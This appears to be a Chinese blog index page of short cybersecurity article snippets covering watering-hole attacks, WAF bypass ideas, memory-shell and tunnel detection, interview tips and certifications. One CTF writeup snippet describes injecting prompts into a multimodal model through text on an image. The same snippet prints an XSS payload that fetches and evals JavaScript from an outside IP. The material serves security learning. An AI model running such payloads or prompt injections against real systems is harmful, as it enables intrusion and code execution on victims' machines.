涨见识了!定制化的渗透测试 - 水坑攻击之偷窥小姐姐的...
文章浏览阅读942次,点赞16次,收藏6次。有些授权测试中,允许红队人员用社会工程学之类的方法进行渗透。钓鱼和水坑则是快速打点或横向的常用手段。钓鱼通常需要绕过目标邮件网关等安全设备,水坑则需要摸清目标的操作习惯。在此简单的罗列一下布置水坑的方法。_基于代理的水坑攻击
网络安全求职面试宝典,轻松搞定面试官!拿下大厂offer
文章浏览阅读744次,点赞8次,收藏11次。回答提示:一般人回答这个问题过于平常,只说姓名、年龄、爱好、工作经验,这些在简历上都有。其实,企业最希望知道的是求职者能否胜任工作,包括:最强的技能、最深入研究的知识领域、性格中最积极的部分、做过的最成功的事,主要的成就等,这些回答关于学习或者生活都可以,但要突出积极的个性和做事的能力,说得合情合理企业才会相信。(最好有简单的实例,一两句话体现出自己的优势)_php面试题
全程干货!清华教授用11部分讲明白Linux运维趋势与分析技巧
文章浏览阅读200次,点赞3次,收藏3次。网络安全指对网络攻击、侵入、干扰、破坏和非法使用以及意外事故的必要防范,使网络和信息系统处于稳定、安全、可靠的运行状态,以及保障信息数据的完整性、保密性、可用性。网站运维有很多东西需要考虑,比如网站的负载,缓存的处理,日志的分析,数据的备份/恢复等等。然而学好网安Linux运维这块肯定是要掌握的,首先 、系统和网络是肯定要学的,而且必须要学好。否则的话,想做一个管理人员是比较有难度的。总结:可以看出在学习Linux运维的时候会用到很多知识版块,还有很多奇淫技巧能让我们提高工作效率,每一部分都是必不可少的。
HW 中如何利用 WAF 缺陷进行绕过
文章浏览阅读786次,点赞16次,收藏9次。在挖洞过程中,往往会遇到各种攻击利用被waf拦截的情况,本文浅析总结了常见的一些绕过思路以及具体实现对于通用性较强的软WAF来说,不得不考虑到各种机器和系统的性能,故对于一些超大数据包、超长数据可能会跳过不检测因此可以填充大量垃圾字符来逃避waf对数据包的检测如下可以采取高并发的攻击手段,waf同样出于性能考虑可能会直接放行部分数据包。由于后端web容器、中间件、数据库、脚本语言的多样性,waf很难覆盖全,容易导致waf解析不了而后端可以正常解析读取导致的绕过。_hwwafsesid
揭秘最为知名的黑客工具之一:Lynis
文章浏览阅读1.1k次,点赞15次,收藏7次。Lynis 是一款开源的安全审计工具,专门用于 Unix 类系统的安全检测和系统加固。它能检测系统配置、文件权限、日志、网络等多个方面,提供详细的安全建议,帮助系统管理员加强系统的安全性。Lynis 支持多种操作系统,包括 Linux、macOS、FreeBSD 和 OpenBSD 等。_lynis 工具
如何排查JAVA内存马
文章浏览阅读395次,点赞5次,收藏8次。1、先查看检查服务器web日志,查看是否有可疑的web访问日志,比如说filter或者listener类型的内存马,会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的请求。2、如在web日志中并未发现异常,可以排查是否为中间件漏洞导致代码执行注入内存马,排查中间件的error.log日志查看是否有可疑的报错,根据注入时间和方法根据业务使用的组件排查是否可能存在java代码执行漏洞以及是否存在过webshell,排查框架漏洞,反序列化漏洞。_java内存马检测
如何判断被搭建了什么隧道
文章浏览阅读424次,点赞5次,收藏10次。1、ICMP隧道,ICMP隧道隧道数据通常比较大ICMP隧道数据包中DATA 往往大于64 比特,部分隧道工具会显示tun的标志。2、SOCKS隧道特征:SOCKS某些隧道存在一些固定16进制,或者通过安全设备告警排查。
CSRF、SSRF和重放攻击有什么区别?
文章浏览阅读339次,点赞4次,收藏10次。重放攻击是将截获的数据包进行重放,达到身份认证等目的。CSRF是跨站请求伪造攻击,由客户端发起。SSRF是服务器端请求伪造,由服务器发起。_h5 重放攻击
关于分析研判的一些问题回答(仅供参考)
文章浏览阅读176次。看响应包和响应码确实不可靠,因为规则库的检测是比较死板的,首先你和客户确认一下资产属性,哪部分使用了log4j的相关组件,哪部分资产是正常业务行为,排除部分无关联资产,然后再检索攻击成功事件里的日志,查看响应体里的内容是否命令执行了,带有敏感数据等等。这个存在正常业务误报的可能,首先确认资产属性,哪些是业务哪些是外部流量这个和客户确认,其次再看外部流量的返回包是否有数据,检索一段时间内的日志,看是否是短期的攻击流量。2、只能看web的日志,注入的sql注入的攻击,网站响应都是200,怎么判断是否攻击成功。
大佬整理的渗透测试合集,共50多份,太牛了必须收藏!
文章浏览阅读183次。渗透测试是指从内网、外网等网络环境中,利用各种手段对某个特定网络进行模拟攻击,目的是为了寻找可能被利用的漏洞,是企业中重要的一环、虽然大多数人在学习后都能快速上手,但渗透测试还是有一定的门槛,今天就给大家分享一套,包括。
2024 ByteCTF大师赛 writeup by Mini-Venom
文章浏览阅读454次,点赞6次,收藏4次。阅读checker代码发现这个题是通过图片注入来获取文本输入里的prompt,考虑到多模态大模型对图片本身有一定理解能力,于是想到在图片上写一些文字prompt进行注入。solution1:fetch远程加载js,这样长度会缩短很多:{{fetch('http://116.198.40.182:19002/').then(a=>a.text().then(a=>eval(a)))}}这个感觉是可以,但是我本地打不通,总之先搓一个py返回xss 目前这个webhook域名太长了。{{}}可以执行js。_字节跳动 ctf 2024 writeup
学习网络安全需要什么电脑配置?
文章浏览阅读317次。按照以上估算,硬盘大小最低为500G。如果本身有下载存储资料的习惯,或者电脑放了电影、游戏、照片、各种工具、电子书等内容,500G不太够用。推荐至少1T以上的硬盘。其他方案:使用移动硬盘存储不常用的资料;删除几乎不会使用的资料。_网络空间安全买什么电脑
网络安全考什么证书比较好?
文章浏览阅读420次,点赞4次,收藏6次。工信部:软考:信息安全工程师,每年11月考试,考试费是200元以内,但是要复习几个月,通过率不高。行业内认可度比较高的是CISP-PTE,费用是10000左右。总结:建议先学好技能、多参加实战,证书是次要的。CNVD的原创漏洞证书找工作比较有用。在校大学生可以考NISP(二级)。_cnvd原创漏洞证书多少钱
金九银十求职必备 Web安全常见面试问题
文章浏览阅读1.4k次,点赞28次,收藏11次。如-p指定端口,-sV识别服务版本,-O识别操作系统,-sS(不建立三次握手的隐式扫描),sT(TCP扫描,信息相对准确),对于禁ping的站点可以用-Pn等,另外nmap强大的脚本也可以提供多种方式,如dos(可能造成拒绝服务),exploit(检测安全漏洞)。字段:host,referer,orgin,content-type,accept-lnguage,accept-encoding,connection,if-modified-since,cookie,xff,user-agent,请求方法。
蓝队宝典 | 异常流量阻断技战法分析与应用
文章浏览阅读907次,点赞11次,收藏17次。当然也包括黑客利用目标环境中允许的通讯协议(如:HTTP,DNS,ICMP等)进行数据泄露,此时这些通讯协议的特征与正常情况的数据传输特征会有所不同。固定阈值检测是最简单的异常流量检测方法,通过设定一个或多个预定义的阈值,当网络流量超过这些阈值时,系统会触发警报或采取阻断措施。:网络攻击行为(如 DDoS 攻击、暴力破解、端口扫描等)通常会在短时间内产生大量异常流量,这些攻击不仅具有高频率、大流量的特征,还可能对目标系统产生致命打击。:异常流量可能导致网络资源的过度消耗,进而导致正常业务的中断。_2024年网络异常流量
跟着旺仔学Python从入门到精通Day01
文章浏览阅读401次,点赞6次,收藏4次。在当今数字化的时代,编程如同一项强大的魔法技能,能帮助我们实现各种创意与想法,而 Python 无疑是其中一把闪耀的魔法棒。Python 以其简洁优雅的语法、丰富强大的库以及广泛的应用领域,吸引着无数初学者踏上探索之旅,同时也为专业开发者提供了高效便捷的工具。
2024年软件测试职业院校技能大赛—ERP管理平台-商品品牌测试用例
文章浏览阅读272次。“ERP 管理平台 ”内置一定数量 Bug,该系统可支持基于 Web 端 的功能测试、自动化测试、性能测试、接口测试、白盒测试、单元测 试等。系统主要模块包括:采购入库、采购退货、库存分布、入库审 核、出库审核、库存调拨、销售出库、销售退货、收入结算、支出结 算、商品管理、仓库信息、供应商信息、客户信息。系统主要角色包 括:采购专员、采购主管、仓库专员、仓库主管、销售专员、销售主管、结算专员、结算主管、系统管理员。_2024软件测试大赛
2024年江西省职业院校技能大赛 (高职组)应用软件系统开发赛项竞赛规程
文章浏览阅读1.6k次,点赞26次,收藏32次。基于给定的系统需求,利用后端 API 提供的数据接口,使用 HTML5、CSS3、JavaScript、Vue.js(ElementUI、 vue-element-admin)等技术,遵循 MVVM 模式完成前端页面,实现业务功能。按照给定的项目需求,进行需求的梳理与规划,使用标准的需求规格说明书(模板),进行需求规格的描述,编写模块概要简述,绘制对应业务流程图/活动图、用例图、类图、时序图、E-R 图。本赛项竞赛总时长 6 小时(1 天进行),各参赛队在规定的时间内,独立完成“竞赛内容”规定的竞赛模块。_应用软件系统开发 技能大赛
今日推荐
周排行